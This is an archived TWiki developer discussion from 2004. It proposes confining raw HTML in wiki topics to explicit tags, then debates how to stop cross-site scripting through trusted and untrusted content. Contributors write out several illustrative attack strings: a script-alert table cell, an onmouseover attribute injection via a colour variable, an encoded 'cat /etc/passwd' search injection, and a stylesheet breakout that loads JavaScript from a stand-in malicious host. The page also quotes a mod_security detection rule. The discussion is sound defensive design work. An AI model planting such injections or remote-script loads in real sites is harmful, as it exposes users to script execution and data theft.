`EXPLICIT` option to process HTML only between special tags

EXPLICIT option to process HTML only between special tags
- Situation
- Suggestion
Discussion

Situation

TWiki's feature, that people can (and must) write HTML tags directly into the topics, has the following pros and cons:

This could be seen as a feature for experienced people.

Where TWiki's syntax is to poor (for tables for instance), people can write HTML for more complex text layout.

Users are forced to use < and > for < and >, even if they don't want and don't know how to write HTML. This is a serious usability problem.

TWiki syntax should be easy to use for simple things, and harder for more complex things. Not vice versa.

It results in cryptic topic raw texts. The raw text is harder to read and edit, especially for people, who don't know HTML (or any other programming languages at all).

Because TWiki is not wysiwyg, raw text should be as readable and easy to learn as possible.

Suggestion

As WalterMundt suggests in BetterVerbatim, I think a start and end tag for HTML inclusion would be a nice solution. (This is like inline assembler in a pascal program code smile )

This is my twiki text, using < and > and everything I want. I just don't have to think about.
For my form I need HTML:
%STARTHTML% 
  <form action="..."> 
    <input ... /> 
    <input ... /> 
  </form>
%ENDHTML%
Then I continue with clean TWiki markup.

As further suggested by WalterMundt, a global ALLOWHTML could be used to choose TWikis behaviour.

AUTO - like now
EXPLICIT - allow HTML between %STARTHTML% %ENDHTML% blocks
NEVER - writing HTML is never possible. why not?

In my opinion, DIRECT should be thought as a compatibility option, rather then a expert mode. EXPLICIT should be the standard behaviour.

Experienced users are still able to write HTML code this way. Other people aren't concerned with this issue at all.

-- StefanSteinegger - 08 Nov 2004

Discussion

Related is that the CommentPlugin can be used to componentise any piece of HTML: create a TWiki.UserTemplates and supply a noform="on" parameter.

This can be used for all sorts of handy things - it moves the messy HTML out of the topic to a place where it can be named, managed and reused. The UserTemplates (ComponentisingForceWikiWord) is currently my favourite.

-- MartinCleaver - 08 Nov 2004

Thanks for the clue. (May be, CommentPlugin should have another name, like FormsPlugin or TemplatePlugin or something.)

But I still want to disable HTML pass-trough from topic raw text to the browser. This < and &ht; stuff is just awful.

-- StefanSteinegger - 09 Nov 2004

Be careful with regards to backwards compatibility. We have huge amounts of embedded html.

FWIW, the ability to incorporate html is a big plus in my opinion, and is a distinguishing feature of TWiki.

-- MartyBacke - 09 Nov 2004

I tend to think of CommentPlugin as "!ComponentPlugin"

Here's another example:

Written simply as:

%COMMENT{type="clocklink"}%

But componentised in http://twiki.org/cgi-bin/view/TWiki/UserTemplates#clocklink

Note that there is actually a form generated, you can inhibit this with:

%COMMENT{type="clocklink" noform="on" Clock="0001P-Yellow"}%

Thus:

-- MartinCleaver - 09 Nov 2004

Solitary > and < only have to be escaped if they are used in a situation where they can be confused with HTML tags. As long as the uses of < and > don't look like HTML, and in general the only time they do is when you are trying to demonstrate HTML tags in text, then TWiki will handle them just fine. Personally I don't see much of a usability issue here.

-- CrawfordCurrie - 10 Nov 2004

The problem occurred in my company when people tried to name keys like <ctrl+F4>. TWikis "auto-html-recognition" feature may be a clever thing, but it has its side-effects. It's making TWiki syntax harder to learn

I understand that there is a lot of html everywhere. There will be an easy solution for that. It would be still the possibility to inline html. I think it's worth to do it.

Again: People that are able to write html are also able to write %STARTHTML%. people that are not familiar with html shoul not be concerned with TWikis "auto-html-recognition" side-effects. That's the usability issue.

Because of the impact in existing code, there should be a compatibility option (should be AUTO, not DIRECT, I changed this now). This setting as a per-topic option would make the compatibility issue much easier. Why not think about the EXCPLICIT option to make TWiki more mature?

-- StefanSteinegger - 11 Nov 2004

This topic has a completly wrong name. It shoul be ExplicitHtmlProcessing. I changed TopicClassification to FeatureBrainstorming.

-- StefanSteinegger - 11 Nov 2004

Thanks Crawford for moving this topic out of GetRidOfHTML.

-- StefanSteinegger - 12 Nov 2004

It's not hard to filter HTML - I managed to do it by accident, before - but the question is what HTML should be filtered. Assuming "filtering" is achieved by converting < and > to < and >, and occurs when a "source" is expanded, the basic rule is to filter HTML from untrusted sources, but not from trusted sources.

Trusted sources are:
- templates
- topics that are change-only for a defined group of people (admins)
- variables that are defined in trusted topics
- code, including plugins (caveat emptor)
Untrusted sources are:
- variables set in user-editable topics
- content included from attachments or by URL

In DEVELOP, variables are already classified according to their source (user variables, various code types) so extending that classification to divide use variables into "trusted" and "untrusted" sets is not that hard (c.f. perl's taint mechanisms). Same with includes.

Untrusted sources can be sanitized using HTML::Scrubber

-- CrawfordCurrie - 23 Nov 2004

CrawfordCurrie, are you sure that this trusted/untrusted split is as easy as you think it is? I tried it and found it to be difficult, and the "Trusted sources are ... code" makes me think you haven't taken much of a look at the practical issues of implementing it ;-). Under your current proposal:

Each plugin would have to be audited for security; writing:

| <script>alert('hello');</script> |

... would defeat your proposal if TablePlugin were installed. It's basically guaranteed that each un-audited plugin will pass through some text from the user.

Verbatim text, since it's untrusted, would be entity-substituted, so it wouldn't be possible to include > in verbatim text (it would show as ">" on the user's screen).
You can get evil stuff into e.g. templates without needing < and >; for example, you can set WEBBGCOLOR to:

" onmouseover="alert('hello');" booger="

Don't get me wrong; I would be thrilled to hear that splitting text into trusted and untrusted could be made to work, because I'm working on a different approach, and it's turning out badly. I think you're underestimating how difficult it is though.

-- AndrewMoise - 29 Nov 2004

"... filter out non singleton < and > ..."

Oh, right. Can you say "UTF-7"? Of course you can. So we filter out "+" and "%" as well.

So why don't we pack in TWiki and its programability and all those features that let people build applications and just go back to the very basic Wiki of years ago ...?

I don't think that's going to happen.

Perhaps someone can find an apache module that does some of it, breaks a whole pile of what we have now by ensuring that script etc. cannot be defined in the output.

But that doesn't help for Codev does it, where we discuss bugs and propose solutions.

-- AntonAylward - 29 Nov 2004

err, Anton, we're trying to find a way to secure TWiki, without loosing all the functionality.

However, it is important that we are able to provide a totally secure default configuration, so that if people try out twiki on a public host, they are not unwitting victims of our carelessness.

-- SvenDowideit - 30 Nov 2004

Andrew, the plugins by their very nature are a different problem. You can treat plugins in one of two ways:

Sandbox them so they can't do anything evil
Treat them as separate products

To all intents and purposes, TWiki has taken the latter approach. The exception to this are the plugins that are bundled by default with the core, which have to be audited. Sven used a good word; "unwitting". We must make absolutely clear what can be trusted, and what can not. It would be great to audit plugins, but the praticalities are something else. As long as the end user cannot assume a "green light" for a plugin, they should be able to make the decision for themselves.

I have indeed thought about implementation of (un)trusted, though I haven't actually done it. I can see several problems with it, mainly related to performance. And there are aspects of HTML that I have never encountered - such as JavaScript in a bgcolor that would catch me out, sure. BTW note that verbatim currently converts < and > to entities.

There are several cases where current TWiki methodology opens potential holes. These holes have to be plugged, no doubt about it. But IMHO given a sensible trusted/untrusted architecture underneath, it can be done. I said it was straightforward job; I didn't say it was a small job, though. The required changes pervade many, many lines of code.

If you want a quick hack, then I would suggest:

entity-convert every occurrence of < and > read from user topics in TWiki::Store::readTopic.
This will break verbatim and pre, so provide %VERBATIM% and %PRE% to compensate.
Change default change permissions in WebPreferences to TWikiAdminGroup, and add a BIG WARNING for sysadmins.
Disable %INCLUDE of arbitrary URLs.

This will disable HTML in user topics, at the cost of functionality. It may also break some plugins, but that's their problem.

-- CrawfordCurrie - 30 Nov 2004

Sven: "err, Anton, we're trying to find a way to secure TWiki, without loosing all the functionality"

Yes, that's my point.

I've just read - http://www.theregister.co.uk/2004/11/29/ie_security_holes/ - about how Microsoft may be creating the problems of the future. Its theme is that they created the problems of today by focusing on features rather than security and are now playing catch-up with security.

Does this sound like TWiki?

Crawford rightly says ".. [the] current TWiki methodology opens potential holes. These holes have to be plugged, no doubt about it. But ... given a sensible trusted/untrusted architecture underneath, it can be done".

What he misses out on is saying something about "small". You can't prove big stuff can be trusted. Too many possibilities of interactions.

You'll also note that he's said in another form what I've also said in many places. We don't have the control over plugin developers and plugins that we have over the core.

I like the "%VERBATIM%" and "%PRE% idea. It also makes for an easy conversion. However we still need do worry about embedded %3Cscript%3E (check the raw!) and things like %27cat%20%2fetc%2fpasswd%27 (check the raw again!) embeded in search strings. I haven't seen anyone address that. And can I once again please bring up the issue of UTF-7, which provides for alternate codings for > and <, which several browsers recognise. Perhaps what we need is for TWiki to look to see what character set is in use before it starts filtering!

In the mean time, might I suggest that the developers concerned take a look at the code used by various chat room services and web-mail packages. If you think about it for a moment, you will realise they are faced with a similar problem. I can send a plain-text message -- even to a destination behind a firewall -- that ends up being read or rendered by code that interprets HTML. You've seen HTML e-mail, haven't you? How do you think phishing-by-email works? The link may say the name of a reputable bank but the URL behind it, the javascript you invoke, is another matter.

Crawford's 'quick hack' will disable more than just plain old HTML. It will break things like Main.Register which has embedded javascript and MartinCleaver's fix to CommentPlugin that componentizes conversion to WikiWords, something I am begingi to use quite extensively. It will mean that we will have to include the javascript in headers, whcih imopacts those of us who want to use pop-up calculators or calendars, and so add the load of them to every topic whether they get used there or not.

There's a lot we've done that's akin to building web appications that rely heavily on ActiveX then finding its a high risk and switching to Firefox and loosing all we've done (this is something I'm seeing in another forum!).

Rather than just take away this capability wholesale, lets see what we can come up with to go in its place.

-- AntonAylward - 30 Nov 2004

Crawford -- regardless of how you treat plugins, someone has to solve any security problems they pose. The question is whether it's righter, overall, to "fix" things in one place for all plugins, or to "fix" each individual plugin. Any solution that doesn't involve one of those happening will leave twiki just as insecure as not doing anything. Your quick hack doesn't address that issue or the WEBBGCOLOR attack.

Anton -- I agree with your deep concern, particularly the IE/ActiveX analogy. You should know that there are people who are concerned about the current (rather appalling) situation of security within twiki, though, who are working on it. It's a very big job, though.

Re: Main.Register; does that really use embedded javascript? I don't see any (that's relevant) on http://twiki.org/cgi-bin/viewauth/Main/Register?raw=on or http://twiki.org/cgi-bin/view/Codev/Nothing. In any case, any realistic solution to this problem will almost certainly disallow any feature that depends on javascript within a topic (with javascript from plugins as likely collateral damage IMO). I saw both of those as sort of minor features; are there important things that depend on the ability to define javascript in those places? Losing pop-up javascript calculators but having twiki install securely by default would be a huge improvement on the current situation IMHO. Any reasonable solution will involve a configuration option that the administrator can use to disable the secure-but-breaks-some-stuff behavior and go back to the way it is now.

This dicussion is badly off-topic for this topic now I think; the question of how to forcibly prevent user-supplied javascript (which is a security issue, and so has to withstand deliberate attacks) is separate from the question of when and how to tell friendly users "please don't put HTML here; use twiki markup instead."

-- AndrewMoise - 01 Dec 2004

Anton,

can I re-pharse that to

Sven: "err, Anton, we're trying to find a way to secure TWiki in its default configuration, without loosing the functionality that we desire in the advanced but riskier configuration"?

as thats what I'm expecting we will need to do in the end.

in the sites I have deployed, I made it clear that there is no security, and that anyone can impersonate anyone else. Thats why the UserCookiePlugin is so simplistic, and insecure. This is not however the way that twiki should ship by default, its a choice that you shoul dhave to make conciously.

-- SvenDowideit - 01 Dec 2004

If I can put something between < and > in a topic, does it matter if its plain old HTML, javascript, CSS or even other stuff that should go in the header such as META or LINK ?

Both are deliberate actions on the part of a user. We should not just think about attacks and such action being done with malicious motives. harmful results can also arise from non-maicious intent.

-- AntonAylward - 01 Dec 2004

Sven: I agree with you about "out of the box". I've long argued that should also be the case with operating systems, and I see that vendors are slowly coming around to this (e.g. the UNIX and UNIX-like platforms shipping with INETD facilities turned off). I think this is good and wish to encourage it.

But we still don't have a whip hand over the "3rd party" suppliers, which are in this case the plug-in developers. When you install a product for your - supposed more secure out of the box than it was before - Windwos XP, the InstallGuard doesn't scream at you "Your System may now be insecure because of installing this application". Can you imagine the vendors putting up with that, even if it is true?

And as I've pointed out already, users, to say nothing of sysadmins, have been educated, no make that conditioned, to value features more than security. I can't see them giving up their pop-up calendars. And since the computer is there to server the user not the other way round, I think this is a justifiable position.

-- AntonAylward - 01 Dec 2004

Andrew: in Main.Register and in MartinCleaver's extension to CommentPlugin look at the in-line code that converts from spaced word to WikiWord. It isn't HTML, that's for sure! It looks like javascript to me.

-- AntonAylward - 01 Dec 2004

Well, insecure third-party things are not preventable, no; my criticism was that since basically every plugin passes through text supplied in the topic at some point, having any plugin installed would subvert Crawford's proposal. To me that's much different from a plugin that accidentally subverts the security model because of an error.

Re: TWikiRegistration and CommentPlugin; okay, I see now. Well, both of these uses are insecure. A user can rewrite the javascript within TWikiRegistration or CommentsTmpl, so sanitizing javascript that comes from those places is correct behavior. The trusted/untrusted split would allow those uses to pass once those topics were write protected, of course...

Within my approach, getting this to work is a little more difficult. Well, CommentsTmpl is pretty easy: put the template in the template, instead of in a topic, and have the plugin arrange for the javascript to go into <head> as a style. TWikiRegistration (which I finally found :-)) is more difficult; I can think of several unpleasant solutions, but no really good one:

Allow the standard variable-definition path to specify a list of additional stylesheets, which must be installed by the administrator within pub/stylesheets or something. Put the javascript there. This is awfully clumsy, but it gets back some more of the flexibility (e.g. user-defined stylesheets, with a little hassle) that is otherwise lost under my approach.
Abandon the automatic spaced-word-to-WikiWord conversion and call the loss a regrettable casualty of the relentless march of progress, er, I mean security.
Put a javascript-containing style to convert spaced words to WikiWords in every template and every page. Simple, but it sucks.

Of these, I dislike the first option the least, but it would be much better to do something, er, better.

-- AndrewMoise - 01 Dec 2004

Andrew: I want to comment on the script in Registration and CommentPlugin first. As with your point about the plugins, this is a different class of problem. This is not a reference to a dot-js file.

You talk about puting the javascript in the <HEAD>. This isn't the kind of thing that goes there. Its not a function, its "in-line" code.

And as for putting all the javascript js files in the <HEAD>, we promptly run into the problem I've mentioned elsewhere. So I want a popup calendar in the one topic where I have a form so users can define events for the CalendarPlugin. Fine. I add the necessary javascript to the /template for that and all the other skins -- OOPS! forgot one, never mind, well it wouldn't have been an oversight if it was in the topic. And I find I also have the references to the js files for every other piece of javascript I want to use in every other topic in every web on my site, regardless of whether a specific topic, no make that 98% of the other topics, use them or not.

You can bet some user is going to complain about the overhead.

No, the real problem is that I can put <SCRIPT ...src= js file ... > and <LINK ...src= css file ... > in the <BODY> and the client side browser will treat it as if it was in the <HEAD>. If the client side browser treated stuff that should be in the <HEAD> occuring elsewhere as an error then the risk has been eliminated.

MattWilkie had a feature in his various skins whereby a variable named INLINESTYLE could be defined in a topic. The current default skin - pattern skin - has a similar feature whereby users can define their own style sheets. It isn't that difficult to imagine a stylesheet that reads:

... stylesheet stuff duplicating default
} /* normal close of last item *

</style>

/* insert script block in HEAD to download a 
   javascript file from a remote location
   to do arbitrary stuff
*/
<script ... src="http://www.bgbadsite.com/nastystuff/attack49.js" ...
</script>

/* now patch up so the rest of the pattern skin template works
<style ....

I'm not a cracker, I don't have that mind set. It was the BGCOLOR example that inspired this. Anything, absolutely ANYTHING that gets expanded at run time in a template can be shoe-horned somehow into doing something the designers didn't originally intend. Its called creativity. People like Crawford employ that creativity in positive ways.

What it comes down to is simply this: any sufficiently powerful system can be abused. Its sort of like Cantor's principle mated with one of Von Neuman's.

The trouble is that as long as security is done as an after-thought rather than as part of the initial concept, it will always be a "bag-on-the-side" and as such will be an inconvenience because it is impeding something that was being done before that was insecure. And people get used to the ~~old~~insecure way of doing it and complain when they lose that facility.

Fact of life. One that Microsoft is having to face right now.

-- AntonAylward - 02 Dec 2004

What I meant by putting the javascript in the HEAD was to make it a style (wordbox { onblur: javascript:{foo} }) -- I thought a construction like that was possible, but apparently it's not. Crap. That means the best I can think of is to add a plugin function which lets the plugin make changes to the topic text after the HTML sanitization has been done (if the plugin promises to be very careful), and make a TWikiRegistrationJavascriptPlugin that adds that javascript in. That sounds awful. That approach would let the popup calendar plugin and such continue to work with modifications, though (as well as failing securely until those modifications are made).

Re: the rest, you haven't followed any of the links I keep hopefully making to UsersCanPutJavascriptInTopics, have you? smile The patch up there does solve the security problems you mention here (e.g. with it, INLINESTYLE doesn't work, nor do a number of other insecure constructs, some of which are semi-necessary for twiki to work). What I'm worrying over now is how to reinstate the features of twiki that that patch currently breaks.

I actually think that for this problem, at least for the immediate future, the "bag on the side" approach is the only one likely to succeed. It's too late to design twiki to be internally resistant to this sort of attack (and in any case that would probably involve a lot of reorganization of user-visible features). Wrapping it in a layer that assumes that everything inside is untrusted, though, can give some assurance of security (though again there will probably be some user-visible changes).

-- AndrewMoise - 02 Dec 2004

You have to somehow be able to distinguish "good" HTML from "tainted". Trying to write "general rules" for sanitizing rendered topics is IMHO doomed to failure, or at least doomed to a mess of special cases and exceptions.

I still believe the "trusted" approach is the right one. For the sake of argument, let's say I have a function "isTrusted" that will tell me if a topic is trusted. I know I can trust anything in a trusted topic, so any variables defined there are inherently trusted, even if they are defined in terms of other variables that are untrustworthy (at this stage there is no way to tell).

Now, when I expand a topic for view, I evaluate the trustworthiness of any topics/variable that contribute to the text of this topic. If any are untrusted, I scrub their input before including it in the final result.

For example, let's say I'm expanding UserTopicA, that includes SystemTopicB, that uses SystemVariableA that is defined in terms of UserVariableB, which is in turn defined in UserTopicA. The following would be scrubbed:

The plain text of UserTopicA, before TML processing, because it comes from an untrusted source viz. UserTopicA.
The value of UserVariableB, because it comes from an untrusted source, viz. UserTopicA.

Nothing else should need to be scrubbed.

Changes to the text made by plugins have to be trusted, though a plugin obviously needs to be told if it can trust the sources TWiki is giving it.

Yes, this involves a lot of careful changes to TWiki source, but it is perfectly do-able in the context of the current architecture.

The approach is very similar to Perl's taint mechanism. I wonder, is there any way to leverage that fact?

-- CrawfordCurrie - 02 Dec 2004

"IsTrusted()". Sounds like a good idea. While you're about it could you also write a fnction that tells if other programs will terminate?

Or do you just mean "has no constructs that may be untrustworthy"? Hmm. Sort of like "GOTOs are untrustworthy. Which means any any forms, since they might allow cross-site scripting; any topic that could be edited, since that results in a input form; any topic that has a search field any where on it, such as in the top right corner ....

I disagree with you, in the general sense, about "changes made to text by plugins have to be trusted". THink, for example, of your own CommentPlugin. It transforms a topic that has no input (HTML) form into one that does, and in doing so opens up the possibility for cross-site scripting.

Can you say "Covert channels"?

-- AntonAylward - 03 Dec 2004

I think we're getting off focus here becuase we haven't decided what we are protecting and what we are protecting it from. We're obsessing about tags and the like.

My use of Crawfords CommentPlugin that buulds a form to allow my uses to make a calendar entry and has a button to popup te javascript calebdar is not the problem. The problem is that the form - any form has input fields that a malicious user can fill in with values that do bad things.

If I could make that topic non-editable (by anyone other than TWikiAdminGroup, all of whom I trust) AND able to be updated by the CommentPlugin AND CommentPlugin did some kind of "taint" checking of the fields, visible and invisible, then the fact that it has javascript in the body wouldn't matter. (OK, I'd have to make the same about the UserTemplate as well.) In one sense this is Crawford's "IsTrusted".

Another example. BGCOLOR and HTTP_EQUIV_ON_VIEW are perfectly safe if they can only be set in the WebPreferences and TWikiPreferences, which topics can only be altered by the trustworthy members of the TWikiAdminGroup AND which are made immutable by puting them in FINALPREFERNCES.

Can you see what I'm saying here? Its not "unsafe constructs", its trust.

The point is not that there is javascript in a topic, the point is that some maliciuous person can put javascript or other nasty in there. Someone you can't trust to be a responsible member of the Wiki Community. We can tollerate errors and mistakes since we can work around those. Heck, some of you even patch up my spelling mistakes for me! But malice is different.

I've mentined that (HTML) forms are a high risk point since it allows users to enter things that can make the CGI scripts do ... stuff that wasn't planned or expected. Eliminating forms or constraining the forms processing though some tighly controlled mechanism -- Crawford's CommentPlugin is an excelent candidate -- is one example.

So, you say, why can't we get rid of the 'edit' tag and make these comment boxes the exclusive form, backed by whatever 'taint' checking is required.

Answer: Because this is Codev. We need to be able to describe things here that end up looking like constructs we might want to prohibit.

-- AntonAylward - 03 Dec 2004

Before we go much further in constucting solutins, lets stop and consider:

What assets are we trying to protect

What threats are we truing to protect them against

If I have a Chrooted TWiki that uses the perl versions of grep and rcs, what are my risks?

Recall: the formal defintion of risk:-

Risk is the probability that an attack will exploit a vulnerability to cause harm or loss to an asset.

We may not know the full set of vulnerabilities that are possible but we should have some idea of the assets.

-- AntonAylward - 03 Dec 2004

See: http://www.modsecurity.org/

Some examples at http://www.modsecurity.org/documentation/quick-examples.html

Security means vigilence, so the scripts that scan the logs and come up with rules to address attacks are part of the package. Not just the package of code, but the apckage of what a sysadmin is responsible for. As a friend of mine says:

"When entrusted to process, you are obligated to safeguard"

The "principles" for mod_security are excelent. TWiki and TWiki developers would do well to adopt them. (Yes, Crawford, I know you already do!) http://www.modsecurity.org/documentation/development-principles.html

Note: Above, I've mentioned that one of the problems is preventing things like javascript as fields in HTML forms. With mod_security ....

This rule checks all variables for JavaScript, allowing it in a variable named html. Disallowing JavaScript in all variables can be very difficult for some applications (most notably CMS tools). By using this rule we disallow JavaScript in all variables except in the one named html, where we know it can appear.
SecFilter "ARGS|!ARG_html" "<[:space:]*script"

-- AntonAylward - 03 Dec 2004

isTrusted() doesn't imply any sophisticated analysis. Someone has to tell you what is trusted and what is not. The more that is trusted, the faster things will go.

templates is really just a read-only web, so that can be trusted. I would set up other read-only webs as trusted. Sysadmins discretion.

Anton, your reference to mod_security just made me realise we may be looking at this the wrong way round. Instead of protecting the user by filtering content from an untrusted source, it is better to make sure you can trust any source. Instead of filtering output, filter input. For example, a simple filter could be enabled in a plugin onSaveHandler that prevents the saving of < and >, thus crippling attempts to write-in HTML. It would be simple to write a plugin that had a number of installer-configurable rules for content-rewriting that filters any topics being saved by a non-admin user.

The one change to the core I would advocate to support this would be the addition of a beforeIncludeHandler that would give the plugin a chance to filter text from an included URL or attachment.

-- CrawfordCurrie - 03 Dec 2004

Filtering input: My appologoes. We have been talking at cross purposes. I've always assumed we were talking about input. The search/grep hack was about input. I've been assuming a system that was 'trusted' when it wa installed and the basic faciltiies and basic configuration was done by a trusted site or system administrator. So the risk came from what was added after that point. Input to HTML forms by users -- the search/grep vulnerability being one example. Cross site scripting problems arrisng from other HTML forms being another. And finally a registerd user editing in a body that exploits a vilnerability in other users browsers. The most obvious of this being something that fetches and runs javascript from a remote site (i.e. not the one running the wiki).

I haven't fully audited the cde of mod_security, but can I once again emphaises that dealing with < and > is only part of the problem. Browsers are a great part of the problem becuase they try to do 'smart things' like deal with percent-hexadecimal representations, other charectar sets and so forth. I see code in mod_security that tries to deal with this.

I wonder if the most pragmatic approach is to adopt mod_security and work with that project rather than add more code to TWiki.

-- AntonAylward - 03 Dec 2004

Another solution: MartinCleaver has just written about PurpleSlurple (http://www.purpleslurple.net). This prompted me to recall a vague idea about topics that have parts that cannot be altered. At the moment I fudge this with a %INCLUDE of a topic that can't be edited. However I think that ther are some ideas about the purple sections that we didn't explore enough when the matter first came up. Perhaps we need to speak to the Wikipedia people to see if thay have any feelings about how this technique can be used as a security-by-compartmentalising tool.

-- AntonAylward - 03 Dec 2004

WebForm
TopicClassification	FeatureEnhancementRequest
TopicSummary	`EXPLICIT` option to process HTML only between special tags.
InterestedParties	StefanSteinegger AntonAylward AndrewMoise
AssignedTo
AssignedToCore
ScheduledFor
RelatedTopics	UsersCanPutJavascriptInTopics
SpecProgress
ImplProgress
DocProgress

Topic revision: r21 - 2004-12-03 - AntonAylward

Account
- Log In
- Register User

Edit
Attach

Ideas, requests, problems regarding TWiki? Send feedback. Ask community in the support forum.
Copyright © 1999-2026 by the contributing authors. All material on this collaboration platform is the property of the contributing authors.

EXPLICIT option to process HTML only between special tags

Situation

Suggestion

Discussion

`EXPLICIT` option to process HTML only between special tags